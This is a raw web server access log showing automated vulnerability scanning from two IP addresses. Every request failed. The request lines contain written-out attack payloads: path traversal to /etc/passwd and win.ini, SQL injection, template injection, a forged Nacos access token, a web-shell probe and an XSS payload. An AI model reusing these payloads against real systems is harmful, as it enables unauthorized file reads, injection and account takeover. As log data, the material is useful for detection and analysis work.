103.153.214.94 POST /api/v1/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 201 2024-12-12 23:50:47 103.153.214.94 POST /api/v1/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 23:50:47 103.153.214.94 POST /api/v1/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 206 2024-12-12 23:50:52 103.153.214.94 GET /wlsecurity.html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 36 2024-12-12 23:50:52 103.153.214.94 GET /index.php option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.15 - 404 7 0 56 2024-12-12 23:51:27 103.153.214.94 GET /index.php page=install 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 23:51:58 103.153.214.94 GET /analytics/saw.dll bieehome&startPage=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 76 2024-12-12 23:52:00 103.153.214.94 GET /duomiphp/ajax.php action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(999999999))) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 31 2024-12-12 23:52:02 103.153.214.94 GET /analytics/saw.dll getPreviewImage&previewFilePath=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 - 404 7 0 62 2024-12-12 23:52:31 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 54 2024-12-12 23:52:33 103.153.214.94 GET /search search_key=%7B%7B1337*1338%7D%7D 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 129 2024-12-12 23:53:13 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 199 2024-12-12 23:53:13 103.153.214.94 GET /api/whoami - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 219 2024-12-12 23:53:20 103.153.214.94 GET /index.php option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 404 7 0 56 2024-12-12 23:54:20 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 42 2024-12-12 23:54:24 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 68 2024-12-12 23:55:56 103.153.214.94 GET /access/set param=enableapi&value=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML++like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 23:56:01 103.153.214.94 GET /download.action filename=../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 67 2024-12-12 23:56:03 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14092.77.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.107+Safari/537.36 - 404 7 0 35 2024-12-12 23:56:06 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 33 2024-12-12 23:57:02 103.153.214.94 GET /exportFile UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 61 2024-12-12 23:59:06 103.153.214.94 GET /index.php option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 23:59:08 103.153.214.94 GET /web_shell_cmd.gch - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 43 2024-12-12 23:59:41 103.153.214.94 GET /_ignition/scripts/--><svg+onload=alert(document.domain)> - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 400 0 0 61